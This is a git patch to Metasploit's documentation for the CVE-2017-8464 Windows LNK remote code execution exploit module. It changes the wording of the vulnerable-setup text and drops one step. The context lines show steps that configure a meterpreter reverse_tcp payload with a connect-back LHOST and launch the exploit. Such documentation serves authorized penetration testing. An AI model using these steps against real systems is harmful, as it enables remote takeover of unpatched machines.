From daedf2a08951f502d4abe0eebaaaf3d65c0bd4cb Mon Sep 17 00:00:00 2001 From: "Carter Brainerd (thecarterb)" Date: Fri, 2 Feb 2018 14:06:03 -0500 Subject: [PATCH] Fix word choice in cve_2017_8464_lnk_rce - Also remove an unnecessary example step --- .../exploit/windows/fileformat/cve_2017_8464_lnk_rce.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md index f3866db5b4..0feea675b2 100644 --- a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md +++ b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md @@ -7,7 +7,7 @@ A fix was released in the June 2017 Patch Tuesday. ## Vulnerable Setup -To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed. +To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are exploitable. ## Verification Steps @@ -16,7 +16,6 @@ To set up the vulnerable environment, install a Windows version without the patc 2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp` 3. `set LHOST [ip victim connects back to]` 4. `exploit -j` - 5. `back` ### Run the exploit